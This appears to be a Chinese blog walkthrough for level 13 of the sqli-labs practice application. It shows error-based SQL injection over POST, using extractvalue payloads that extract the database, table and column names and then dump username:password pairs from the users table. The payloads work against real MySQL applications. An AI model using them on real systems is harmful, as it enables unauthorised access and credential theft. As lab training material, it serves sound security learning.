sqli-labs第十三关——’）POST报错注入

一：判断注入类型

uname=1')&passwd=123

由1，1’，1‘），1”输入的报错，我们尝试闭合1')

uname=1') or 1#&passwd=123

闭合成功（其他几种闭合均报错）但无回显 

得出结论：是单引号括号类型，并且可以尝试报错注入

二：开始注入

1.爆数据库名 

uname=1') and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2.爆表名 

uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名 

uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

 4.爆数据

先用count判断一下数据量

uname=1') and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

sqli—labs第五关——报错注入-CSDN博客

由之前的报错注入我们知道，有两种子句能防止查询数据不完整，这里我们分两次来得到数据

uname=1') and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1') and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花！！！❀❀❀